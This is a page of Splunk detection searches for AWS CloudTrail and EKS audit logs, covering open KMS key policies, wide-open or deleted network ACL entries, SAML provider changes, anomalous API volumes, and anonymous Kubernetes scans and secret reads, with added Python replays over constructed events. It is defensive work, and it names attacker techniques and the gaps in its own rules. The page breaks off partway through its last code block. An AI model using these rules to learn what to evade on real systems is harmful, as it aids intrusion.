Search

`cloudtrail` eventName=CreateKey OR eventName=PutKeyPolicy | spath input=requestParameters.policy output=key_policy_statements path=Statement{} | mvexpand key_policy_statements | spath input=key_policy_statements output=key_policy_action_1 path=Action | spath input=key_policy_statements output=key_policy_action_2 path=Action{} | eval key_policy_action=mvappend(key_policy_action_1, key_policy_action_2) | spath input=key_policy_statements output=key_policy_principal path=Principal.AWS | search key_policy_action="kms:Encrypt" | where key_policy_principal="*" | stats count min(_time) as firstTime max(_time) as lastTime by eventName eventSource eventID awsRegion userIdentity.principalId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |`aws_detect_users_creating_keys_with_encrypt_policy_without_mfa_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for AWS and the Splunk App for AWS. This search works with CloudTrail logs. Two details matter when adapting it: in the `search` command `*` is a wildcard, so the comparison against the literal `*` principal must be made with `where`, which compares strings exactly; and a statement that grants `kms:*` (or a bare `"Principal": "*"` rather than `{"AWS": "*"}`) confers the same access but does not match the literal strings, so extend the match if you want those forms covered.
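The same key-policy inspection, as an added Python example (not Splunk's code) run against a constructed CloudTrail CreateKey record. It mirrors the search's handling of `Action` as either a string or a list and of `Principal.AWS`, and goes beyond the page's search in three labelled ways: it checks `Effect`, treats a bare `"Principal": "*"` as the anonymous principal, and matches IAM action wildcards such as `kms:*`. The event contents, principal ID and statement IDs are constructed:

```python
"""Added example, not part of Splunk Security Content: the key-policy inspection
behind "Aws detect users creating keys with encrypt policy without mfa", done in
Python against a constructed CloudTrail record instead of SPL spath/mvexpand."""
import json
from fnmatch import fnmatchcase

WATCHED_EVENTS = ("CreateKey", "PutKeyPolicy")


def make_event(event_name, policy, principal_id="AIDAEXAMPLEPRINCIPAL"):
    """Build a minimal CloudTrail record.  As in real records, the key policy
    travels in requestParameters.policy as a JSON document serialised to a string."""
    return {
        "eventName": event_name,
        "eventSource": "kms.amazonaws.com",
        "awsRegion": "us-east-1",
        "userIdentity": {"principalId": principal_id},
        "requestParameters": {"policy": json.dumps(policy)},
    }


# Constructed sample: an admin statement plus one that hands kms:Encrypt to everyone.
SAMPLE_EVENT = make_event("CreateKey", {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "Admin", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::111122223333:root"},
         "Action": "kms:*", "Resource": "*"},
        {"Sid": "AnyoneCanEncrypt", "Effect": "Allow",
         "Principal": {"AWS": "*"},
         "Action": ["kms:Encrypt", "kms:GenerateDataKey"], "Resource": "*"},
    ],
})


def _as_list(value):
    """Action and Principal.AWS are a string or a list in IAM policy JSON
    (the search's path=Action / path=Action{} pair handles the same ambiguity)."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _aws_principals(statement):
    principal = statement.get("Principal")
    if principal == "*":            # bare "*" is shorthand for {"AWS": "*"}
        return ["*"]
    if isinstance(principal, dict):
        return _as_list(principal.get("AWS"))
    return []


def _grants(action_patterns, wanted):
    """IAM action matching is case-insensitive and allows * and ? wildcards,
    so kms:* or * grants kms:Encrypt just as the literal string does."""
    return any(fnmatchcase(wanted.lower(), pattern.lower()) for pattern in action_patterns)


def open_encrypt_statements(event, wanted="kms:Encrypt"):
    """Return the Sids of Allow statements in a CreateKey/PutKeyPolicy event that
    grant `wanted` to the anonymous principal.  Beyond the page's search, Effect
    is checked and wildcard actions / a bare "*" principal count as matches."""
    if event.get("eventName") not in WATCHED_EVENTS:
        return []
    policy = json.loads(event["requestParameters"]["policy"])
    hits = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        if "*" in _aws_principals(stmt) and _grants(_as_list(stmt.get("Action")), wanted):
            hits.append(stmt.get("Sid", "<no Sid>"))
    return hits


if __name__ == "__main__":
    print(open_encrypt_statements(SAMPLE_EVENT))   # ['AnyoneCanEncrypt']
```

The admin statement is ignored because its principal is a specific account root, while the second statement is reported. A Deny statement with the same principal and action is not reported, and an event other than CreateKey or PutKeyPolicy yields nothing, matching the eventName filter at the front of the search.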

Required field

ATT&CK

ID Technique Tactic
T1486 Data Encrypted for Impact Impact


Kill Chain Phase

Known False Positives

unknown

Reference


Test Dataset


version: 1


Aws detect users with kms keys performing encryption s3

This search provides detection of users with KMS keys performing encryption specifically against S3 buckets.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1486
  • Last Updated: 2021-01-11

Search

`cloudtrail` eventName=CopyObject requestParameters.x-amz-server-side-encryption="aws:kms" | rename requestParameters.bucketName AS bucket_name, requestParameters.x-amz-copy-source AS src_file, requestParameters.key AS dest_file | stats count min(_time) as firstTime max(_time) as lastTime values(src_file) AS src_file values(dest_file) AS dest_file values(userAgent) AS userAgent values(region) AS region values(src) AS src by user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |`aws_detect_users_with_kms_keys_performing_encryption_s3_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for AWS and the Splunk App for AWS. This search works with CloudTrail logs.

Required field

ATT&CK

ID Technique Tactic
T1486 Data Encrypted for Impact Impact


Kill Chain Phase

Known False Positives

Buckets configured for server-side encryption with KMS keys (SSE-KMS) will generate this activity legitimately.

Reference


Test Dataset


version: 1


Aws eks kubernetes cluster sensitive object access

This search provides information on Kubernetes accounts accessing sensitive objects such as configmaps or secrets.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-06-23

Search

`aws_cloudwatchlogs_eks` (objectRef.resource=secrets OR objectRef.resource=configmaps) sourceIPs{}!="::1" sourceIPs{}!="127.0.0.1" | table sourceIPs{} user.username user.groups{} objectRef.resource objectRef.namespace objectRef.name annotations.authorization.k8s.io/reason | dedup user.username user.groups{} | `aws_eks_kubernetes_cluster_sensitive_object_access_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for Amazon Web Services and the Splunk App for AWS. This search works with CloudWatch logs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Sensitive object access is not necessarily malicious but user and object context can provide guidance for detection.

Reference

Test Dataset

version: 1


Aws network access control list created with all open ports

The search looks for CloudTrail events to detect whether any network ACL entries were created or replaced that allow inbound traffic from a specified CIDR on all protocols (aclProtocol -1) or on a port range spanning more than 1024 ports.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1562.007
  • Last Updated: 2021-01-11

Search

`cloudtrail` eventName=CreateNetworkAclEntry OR eventName=ReplaceNetworkAclEntry requestParameters.ruleAction=allow requestParameters.egress=false requestParameters.aclProtocol=-1 | append [search `cloudtrail` eventName=CreateNetworkAclEntry OR eventName=ReplaceNetworkAclEntry requestParameters.ruleAction=allow requestParameters.egress=false requestParameters.aclProtocol!=-1 | eval port_range='requestParameters.portRange.to' - 'requestParameters.portRange.from' | where port_range>1024] | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by userName userIdentity.principalId eventName requestParameters.ruleAction requestParameters.egress requestParameters.aclProtocol requestParameters.portRange.to requestParameters.portRange.from src userAgent requestParameters.cidrBlock | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_network_access_control_list_created_with_all_open_ports_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS, version 4.4.0 or later, and configure your CloudTrail inputs.

Required field

ATT&CK

ID Technique Tactic
T1562.007 Disable or Modify Cloud Firewall Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

It's possible that an admin has created this ACL entry with all ports open for some legitimate purpose; however, such rules should be scoped and not allowed in a production environment.

Reference

Test Dataset


version: 2


Aws network access control list deleted

Enforcing network-access controls is one of the defensive mechanisms used by cloud administrators to restrict access to a cloud instance. After an attacker has gained control of the AWS console by compromising an admin account, they can delete network ACL entries and open access to the instance from anywhere. This search queries CloudTrail logs for users deleting inbound network ACL entries (DeleteNetworkAclEntry).

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1562.007
  • Last Updated: 2021-01-12

Search

`cloudtrail` eventName=DeleteNetworkAclEntry requestParameters.egress=false | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by userName userIdentity.principalId eventName requestParameters.egress src userAgent | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_network_access_control_list_deleted_filter`
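As an added example (not Splunk's code), the following Python replays the two network ACL checks on this page, "Aws network access control list created with all open ports" and "Aws network access control list deleted", over constructed CloudTrail records. Field names follow the requestParameters used in the two searches; the records, user names and IP addresses are constructed.

```python
"""Added example (not Splunk's code): the two network ACL checks on this page, replayed in
Python over constructed CloudTrail records.

check 1 ("... created with all open ports"): CreateNetworkAclEntry / ReplaceNetworkAclEntry
  with ruleAction=allow and egress=false, where aclProtocol is -1 (all protocols, portRange
  ignored by AWS) or the port range spans more than 1024 ports.
check 2 ("... deleted"): DeleteNetworkAclEntry with egress=false.
Field names follow the requestParameters used in the searches; the sample records, user
names and IP addresses are constructed.
"""
from collections import Counter

WIDE_RANGE_PORTS = 1024   # the SPL flags port_range = portRange.to - portRange.from > 1024


def _params(ev):
    return ev.get("requestParameters") or {}


def _is_false(value):
    """CloudTrail serialises egress as a JSON boolean; tolerate the string form as well."""
    return value is False or str(value).lower() == "false"


def is_wide_open_ingress_rule(ev):
    """Check 1: an inbound allow rule covering every protocol or more than 1024 ports."""
    if ev.get("eventName") not in ("CreateNetworkAclEntry", "ReplaceNetworkAclEntry"):
        return False
    p = _params(ev)
    if p.get("ruleAction") != "allow" or not _is_false(p.get("egress")):
        return False
    if str(p.get("aclProtocol")) == "-1":
        return True   # all protocols: every port is open regardless of portRange
    rng = p.get("portRange") or {}
    try:
        return int(rng["to"]) - int(rng["from"]) > WIDE_RANGE_PORTS
    except (KeyError, TypeError, ValueError):
        return False  # e.g. ICMP entries carry no portRange, so there is nothing to measure


def is_ingress_rule_deletion(ev):
    """Check 2: deletion of an inbound network ACL entry."""
    return ev.get("eventName") == "DeleteNetworkAclEntry" and _is_false(_params(ev).get("egress"))


def run_checks(events):
    """Return two Counters keyed like the SPL `stats ... by` clauses (trimmed to the key fields)."""
    wide_open, deletions = Counter(), Counter()
    for ev in events:
        user = (ev.get("userIdentity") or {}).get("userName", "unknown")
        p = _params(ev)
        if is_wide_open_ingress_rule(ev):
            wide_open[(user, ev["eventName"], p.get("cidrBlock"), ev.get("sourceIPAddress"))] += 1
        elif is_ingress_rule_deletion(ev):
            deletions[(user, ev["eventName"], p.get("networkAclId"), ev.get("sourceIPAddress"))] += 1
    return wide_open, deletions


def _rec(name, user, src, **params):
    """Minimal constructed CloudTrail record carrying only the fields the checks read."""
    return {"eventName": name, "userIdentity": {"principalId": "AIDAEXAMPLE", "userName": user},
            "sourceIPAddress": src, "userAgent": "aws-cli/2.1.0", "requestParameters": params}


SAMPLE_EVENTS = [
    # all protocols inbound from anywhere: flagged by check 1
    _rec("CreateNetworkAclEntry", "alice", "198.51.100.7", networkAclId="acl-0a", ruleNumber=100,
         ruleAction="allow", egress=False, aclProtocol="-1", cidrBlock="0.0.0.0/0"),
    # TCP 1024-65535 inbound (64511 ports): flagged by check 1
    _rec("ReplaceNetworkAclEntry", "alice", "198.51.100.7", networkAclId="acl-0a", ruleNumber=110,
         ruleAction="allow", egress=False, aclProtocol="6", cidrBlock="0.0.0.0/0",
         portRange={"from": 1024, "to": 65535}),
    # TCP 443 only: not flagged
    _rec("CreateNetworkAclEntry", "bob", "203.0.113.9", networkAclId="acl-0b", ruleNumber=120,
         ruleAction="allow", egress=False, aclProtocol="6", cidrBlock="10.0.0.0/8",
         portRange={"from": 443, "to": 443}),
    # outbound rule: both checks require egress=false, so ignored
    _rec("CreateNetworkAclEntry", "bob", "203.0.113.9", networkAclId="acl-0b", ruleNumber=130,
         ruleAction="allow", egress=True, aclProtocol="-1", cidrBlock="0.0.0.0/0"),
    # deletion of an inbound entry: flagged by check 2
    _rec("DeleteNetworkAclEntry", "alice", "198.51.100.7", networkAclId="acl-0a", ruleNumber=50, egress=False),
]


if __name__ == "__main__":
    wide_open, deletions = run_checks(SAMPLE_EVENTS)
    print("wide-open ingress rules:", dict(wide_open))
    print("inbound entry deletions:", dict(deletions))
```

The "all open ports" search evaluates the port-range width only for rules whose protocol is not -1, because AWS ignores portRange when aclProtocol is -1; the code above follows the same order so that a protocol -1 rule with no portRange is still reported.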

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs.

Required field

ATT&CK

ID Technique Tactic
T1562.007 Disable or Modify Cloud Firewall Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

It's possible that a user has legitimately deleted a network ACL.

Reference

Test Dataset


version: 2


Aws saml access by provider user and principal

This search reports SAML-federated access to AWS (AssumeRoleWithSAML) by identity provider (issuer), session name, and targeted role or principal. It gives the context needed to detect abnormal access and potential credential hijacking or forgery, especially in federated environments that use SAML either inside the perimeter or at the cloud provider.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2021-01-26

Search

`cloudtrail` eventName=AssumeRoleWithSAML | stats count min(_time) as firstTime max(_time) as lastTime by requestParameters.principalArn requestParameters.roleArn requestParameters.roleSessionName recipientAccountId responseElements.issuer sourceIPAddress userAgent | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |`aws_saml_access_by_provider_user_and_principal_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for AWS and the Splunk App for AWS. This search works with CloudTrail logs.

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

Golden SAML attacks and other SAML assertion hijacks or forgeries are very difficult to detect, because access to the cloud provider with a forged assertion looks exactly like normal access. However, the source IP (sourceIPAddress), the user (roleSessionName), and the principal targeted at the receiving cloud provider, combined with endpoint credential-access and abuse detection searches, can provide the context needed to detect these attacks.

Reference


Test Dataset


version: 1


Aws saml update identity provider

This search detects updates to a SAML identity provider in AWS (UpdateSAMLProvider). Such updates need to be monitored closely, since they may indicate compromise of federated credentials at the perimeter, or a backdoor for access from another cloud provider set up by an attacker.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2021-01-26

Search

`cloudtrail` eventName=UpdateSAMLProvider | stats count min(_time) as firstTime max(_time) as lastTime by eventType eventName requestParameters.sAMLProviderArn userIdentity.sessionContext.sessionIssuer.arn sourceIPAddress userIdentity.accessKeyId userIdentity.principalId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |`aws_saml_update_identity_provider_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for AWS and the Splunk App for AWS. This search works with CloudTrail logs.

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

Updating a SAML provider or creating a new one is not necessarily malicious; however, it needs to be closely monitored.

Reference


Test Dataset


version: 1


Abnormally high number of cloud infrastructure api calls

This search will detect a spike in the number of API calls made to your cloud infrastructure environment by a user.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078.004
  • Last Updated: 2020-09-07

Search

| tstats count as api_calls values(All_Changes.command) as command from datamodel=Change where All_Changes.user!=unknown All_Changes.status=success by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time, "%H") | eval HourOfDay=floor(HourOfDay/4)*4 | eval DayOfWeek=strftime(_time, "%w") | eval isWeekend=if(DayOfWeek >= 1 AND DayOfWeek <= 5, 0, 1) | join user HourOfDay isWeekend [ summary cloud_excessive_api_calls_v1] | where cardinality >=16 | apply cloud_excessive_api_calls_v1 threshold=0.005 | rename "IsOutlier(api_calls)" as isOutlier | where isOutlier=1 | eval expected_upper_threshold = mvindex(split(mvindex(BoundaryRanges, -1), ":"), 0) | where api_calls > expected_upper_threshold | eval distance_from_threshold = api_calls - expected_upper_threshold | table _time, user, command, api_calls, expected_upper_threshold, distance_from_threshold | `abnormally_high_number_of_cloud_infrastructure_api_calls_filter`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs. You also must run the baseline search `Baseline Of Cloud Infrastructure API Calls Per User` to create the probability density function.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Reference

Test Dataset


version: 1


Abnormally high number of cloud instances destroyed

This search counts successfully destroyed cloud instances per user in hourly bins, labels each bin with its 4-hour block and whether it falls on a weekend, then applies the probability density model created by the baseline search and alerts on any outliers.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078.004
  • Last Updated: 2020-08-21

Search

| tstats count as instances_destroyed values(All_Changes.object_id) as object_id from datamodel=Change where All_Changes.action=deleted AND All_Changes.status=success AND All_Changes.object_category=instance by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time, "%H") | eval HourOfDay=floor(HourOfDay/4)*4 | eval DayOfWeek=strftime(_time, "%w") | eval isWeekend=if(DayOfWeek >= 1 AND DayOfWeek <= 5, 0, 1) | join HourOfDay isWeekend [summary cloud_excessive_instances_destroyed_v1] | where cardinality >=16 | apply cloud_excessive_instances_destroyed_v1 threshold=0.005 | rename "IsOutlier(instances_destroyed)" as isOutlier | where isOutlier=1 | eval expected_upper_threshold = mvindex(split(mvindex(BoundaryRanges, -1), ":"), 0) | eval distance_from_threshold = instances_destroyed - expected_upper_threshold | table _time, user, instances_destroyed, expected_upper_threshold, distance_from_threshold, object_id | `abnormally_high_number_of_cloud_instances_destroyed_filter`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs. You also must run the baseline search `Baseline Of Cloud Instances Destroyed` to create the probability density function.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Many service accounts configured within a cloud infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user.

Reference

Test Dataset

version: 1


Abnormally high number of cloud instances launched

This search counts successfully created cloud instances per user in hourly bins, labels each bin with its 4-hour block and whether it falls on a weekend, then applies the probability density model created by the baseline search and alerts on any outliers.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078.004
  • Last Updated: 2020-08-21

Search

| tstats count as instances_launched values(All_Changes.object_id) as object_id from datamodel=Change where (All_Changes.action=created) AND All_Changes.status=success AND All_Changes.object_category=instance by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time, "%H") | eval HourOfDay=floor(HourOfDay/4)*4 | eval DayOfWeek=strftime(_time, "%w") | eval isWeekend=if(DayOfWeek >= 1 AND DayOfWeek <= 5, 0, 1) | join HourOfDay isWeekend [summary cloud_excessive_instances_created_v1] | where cardinality >=16 | apply cloud_excessive_instances_created_v1 threshold=0.005 | rename "IsOutlier(instances_launched)" as isOutlier | where isOutlier=1 | eval expected_upper_threshold = mvindex(split(mvindex(BoundaryRanges, -1), ":"), 0) | eval distance_from_threshold = instances_launched - expected_upper_threshold | table _time, user, instances_launched, expected_upper_threshold, distance_from_threshold, object_id | `abnormally_high_number_of_cloud_instances_launched_filter`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs. You also must run the baseline search `Baseline Of Cloud Instances Launched` to create the probability density function.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Many service accounts configured within an AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user.

Reference

Test Dataset

version: 2


Abnormally high number of cloud security group api calls

This search will detect a spike in the number of API calls related to security groups made to your cloud infrastructure environment by a user.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078.004
  • Last Updated: 2020-09-07

Search

| tstats count as security_group_api_calls values(All_Changes.command) as command from datamodel=Change where All_Changes.object_category=firewall AND All_Changes.status=success by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time, "%H") | eval HourOfDay=floor(HourOfDay/4)*4 | eval DayOfWeek=strftime(_time, "%w") | eval isWeekend=if(DayOfWeek >= 1 AND DayOfWeek <= 5, 0, 1) | join user HourOfDay isWeekend [ summary cloud_excessive_security_group_api_calls_v1] | where cardinality >=16 | apply cloud_excessive_security_group_api_calls_v1 threshold=0.005 | rename "IsOutlier(security_group_api_calls)" as isOutlier | where isOutlier=1 | eval expected_upper_threshold = mvindex(split(mvindex(BoundaryRanges, -1), ":"), 0) | where security_group_api_calls > expected_upper_threshold | eval distance_from_threshold = security_group_api_calls - expected_upper_threshold | table _time, user, command, security_group_api_calls, expected_upper_threshold, distance_from_threshold | `abnormally_high_number_of_cloud_security_group_api_calls_filter`
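The four "Abnormally high number of cloud ..." searches on this page (infrastructure API calls, instances destroyed, instances launched, and security group API calls) share one pipeline: hourly counts per user, a 4-hour block and weekday/weekend label on each bin, a join against the MLTK DensityFunction summary, a cardinality floor of 16, and an alert when the count exceeds the model's upper boundary. The following Python reproduces that pipeline over constructed hourly counts. It is an added example, not Splunk's or MLTK's code: the density model is replaced by a normal fit with a one-sided upper tail of mass 0.005, so the boundary values it prints are illustrative rather than what `apply ... threshold=0.005` would produce, and the user name and counts are constructed.

```python
"""Added example (not Splunk's or MLTK's code): the feature engineering and outlier test
shared by the four "Abnormally high number of cloud ..." searches on this page, in plain
Python over constructed hourly counts.

Each search counts a user's successful events in 1h bins, labels each bin with a 4-hour
block (floor(hour/4)*4) and a weekday/weekend flag, joins the MLTK DensityFunction summary
for that (user, block, flag), insists on at least 16 baseline observations (cardinality),
and alerts when the count exceeds the model's upper boundary. Here the MLTK model is
replaced by a normal fit with a one-sided upper tail of mass 0.005 (threshold=0.005 in the
searches); MLTK fits and splits tails differently, so the boundary values are illustrative.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from statistics import NormalDist, mean, pstdev

THRESHOLD = 0.005        # tail probability, as in `apply ... threshold=0.005`
MIN_CARDINALITY = 16     # `where cardinality >= 16`


def features(ts):
    """(4-hour block, is_weekend) exactly as the SPL derives them with %H and %w."""
    block = (ts.hour // 4) * 4
    dow = ts.isoweekday() % 7            # same numbering as %w: 0=Sunday ... 6=Saturday
    return block, (0 if 1 <= dow <= 5 else 1)


def build_baseline(hourly_counts):
    """hourly_counts: iterable of (user, datetime, count). Returns {(user, block, weekend): summary}."""
    samples = defaultdict(list)
    for user, ts, n in hourly_counts:
        samples[(user,) + features(ts)].append(n)
    baseline = {}
    for key, xs in samples.items():
        mu, sigma = mean(xs), pstdev(xs)
        # Degenerate fit (constant history): anything above the constant is an outlier.
        upper = mu if sigma == 0 else NormalDist(mu, sigma).inv_cdf(1 - THRESHOLD)
        baseline[key] = {"cardinality": len(xs), "expected_upper_threshold": upper}
    return baseline


def find_outliers(hourly_counts, baseline):
    """Apply the baseline; returns rows shaped like the SPL `table` output."""
    rows = []
    for user, ts, n in hourly_counts:
        summary = baseline.get((user,) + features(ts))
        if summary is None or summary["cardinality"] < MIN_CARDINALITY:
            continue   # too little history for this user and time of day: stay silent
        upper = summary["expected_upper_threshold"]
        if n > upper:
            rows.append({"_time": ts, "user": user, "count": n,
                         "expected_upper_threshold": round(upper, 1),
                         "distance_from_threshold": round(n - upper, 1)})
    return rows


def constructed_history():
    """Three weeks of weekday 08:00-11:00 activity for one user (18-22 calls/hour) plus one spike."""
    start = datetime(2020, 8, 3, tzinfo=timezone.utc)   # a Monday
    rows = []
    for day in range(21):
        for hour in (8, 9, 10, 11):
            ts = start + timedelta(days=day, hours=hour)
            if ts.isoweekday() <= 5:
                rows.append(("deploy-bot", ts, 18 + (day + hour) % 5))
    rows.append(("deploy-bot", datetime(2020, 8, 24, 9, tzinfo=timezone.utc), 240))   # the spike
    return rows


if __name__ == "__main__":
    history = constructed_history()
    model = build_baseline(history[:-1])     # baseline from everything except the last hour
    for row in find_outliers(history, model):
        print(row)
```

The cardinality floor is what keeps a user with only a few hours of history from alerting on their second hour of activity; the same floor is why these searches stay silent for new users until the baseline search has accumulated enough bins for them.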

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs. You also must run the baseline search `Baseline Of Cloud Security Group API Calls Per User` to create the probability density function model.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Reference

Test Dataset


version: 1


Amazon eks kubernetes pod scan detection

This search provides detection information on unauthenticated requests against the Kubernetes Pods API.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1526
  • Last Updated: 2020-04-15

Search

`aws_cloudwatchlogs_eks` "user.username"="system:anonymous" verb=list objectRef.resource=pods requestURI="/api/v1/pods" | rename source as cluster_name sourceIPs{} as src_ip | stats count min(_time) as firstTime max(_time) as lastTime values(responseStatus.reason) values(responseStatus.code) values(userAgent) values(verb) values(requestURI) by src_ip cluster_name user.username user.groups{} | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `amazon_eks_kubernetes_pod_scan_detection_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudWatch EKS Logs inputs. Please also customize the `amazon_eks_kubernetes_pod_scan_detection_filter` macro to filter out the false positives.

Required field

ATT&CK

ID Technique Tactic
T1526 Cloud Service Discovery Discovery


Kill Chain Phase

  • Reconnaissance


Known False Positives

Not all unauthenticated requests are malicious, but request frequency, user agent, source IPs, and direct requests to the Pods API provide context.

Reference

Test Dataset

version: 1


Amazon eks kubernetes cluster scan detection

This search provides information on unauthenticated requests against a Kubernetes cluster in AWS, by user agent and authentication data.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1526
  • Last Updated: 2020-04-15

Search

`aws_cloudwatchlogs_eks` "user.username"="system:anonymous" userAgent!="AWS Security Scanner" | rename sourceIPs{} as src_ip | stats count min(_time) as firstTime max(_time) as lastTime values(responseStatus.reason) values(source) as cluster_name values(responseStatus.code) values(userAgent) as http_user_agent values(verb) values(requestURI) by src_ip user.username user.groups{} | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` |`amazon_eks_kubernetes_cluster_scan_detection_filter`
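The following Python replays this search together with the two other EKS audit-log searches on this page, "Amazon eks kubernetes pod scan detection" and "Aws eks kubernetes cluster sensitive object access", over constructed Kubernetes audit events of the shape EKS ships to CloudWatch Logs. It is an added example, not Splunk's code; the events, user names and IP addresses are constructed. Where the SPL reads the multivalue sourceIPs{} field, the code treats an event with any loopback hop as local, which is one reading of the `!=` tests in the sensitive object access search.

```python
"""Added example (not Splunk's code): the three EKS audit-log checks on this page,
replayed in Python over constructed Kubernetes audit events of the shape EKS ships to
CloudWatch Logs (user.username, sourceIPs, verb, requestURI, objectRef, ...).

  pod_scan          system:anonymous listing /api/v1/pods (pod scan detection)
  cluster_scan      any system:anonymous request whose userAgent is not
                    "AWS Security Scanner" (cluster scan detection)
  sensitive_access  reads of secrets/configmaps not from a loopback source
                    (sensitive object access)
All sample events are constructed; the IP addresses are documentation ranges.
"""
from collections import defaultdict

SAMPLE_AUDIT = [
    {"kind": "Event", "verb": "list", "requestURI": "/api/v1/pods",
     "user": {"username": "system:anonymous", "groups": ["system:unauthenticated"]},
     "sourceIPs": ["198.51.100.23"], "userAgent": "python-requests/2.25",
     "objectRef": {"resource": "pods"}, "responseStatus": {"code": 403, "reason": "Forbidden"}},
    {"kind": "Event", "verb": "get", "requestURI": "/version",
     "user": {"username": "system:anonymous", "groups": ["system:unauthenticated"]},
     "sourceIPs": ["198.51.100.23"], "userAgent": "kube-hunter/0.4",
     "responseStatus": {"code": 200}},
    {"kind": "Event", "verb": "get", "requestURI": "/healthz",
     "user": {"username": "system:anonymous", "groups": ["system:unauthenticated"]},
     "sourceIPs": ["10.0.0.5"], "userAgent": "AWS Security Scanner",
     "responseStatus": {"code": 200}},
    {"kind": "Event", "verb": "get", "requestURI": "/api/v1/namespaces/prod/secrets/db-creds",
     "user": {"username": "kubernetes-admin", "groups": ["system:masters", "system:authenticated"]},
     "sourceIPs": ["203.0.113.4"], "userAgent": "kubectl/v1.19",
     "objectRef": {"resource": "secrets", "namespace": "prod", "name": "db-creds"},
     "annotations": {"authorization.k8s.io/reason": "RBAC: allowed by ClusterRoleBinding \"cluster-admin\""},
     "responseStatus": {"code": 200}},
    {"kind": "Event", "verb": "list", "requestURI": "/api/v1/namespaces/kube-system/configmaps",
     "user": {"username": "system:kube-controller-manager", "groups": ["system:authenticated"]},
     "sourceIPs": ["127.0.0.1"], "userAgent": "kube-controller-manager/v1.19",
     "objectRef": {"resource": "configmaps", "namespace": "kube-system"},
     "responseStatus": {"code": 200}},
]

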